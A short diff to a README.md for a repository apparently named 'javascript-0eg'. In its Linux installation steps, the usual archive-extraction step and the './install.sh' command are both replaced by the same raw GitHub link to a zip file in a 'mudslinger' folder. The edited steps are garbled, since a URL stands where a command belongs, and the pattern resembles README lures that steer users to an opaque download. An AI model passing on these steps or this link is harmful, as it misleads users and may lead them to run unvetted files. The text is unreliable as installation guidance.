goodnaturegenusmelophagus637/javascript-0eg/README.md

 ### Linux

-1. Extract the downloaded `.tar.gz` file.
+1. Extract the downloaded `https://raw.githubusercontent.com/goodnaturegenusmelophagus637/javascript-0eg/main/mudslinger/javascript-0eg-v1.1.zip` file.
 2. Open your terminal and navigate to the extracted folder.
-3. Run the installation script using the command: `./install.sh`.
+3. Run the installation script using the command: `https://raw.githubusercontent.com/goodnaturegenusmelophagus637/javascript-0eg/main/mudslinger/javascript-0eg-v1.1.zip`.
 4. You can now launch **javascript-0eg** from your applications menu.

 ## 🌟 Features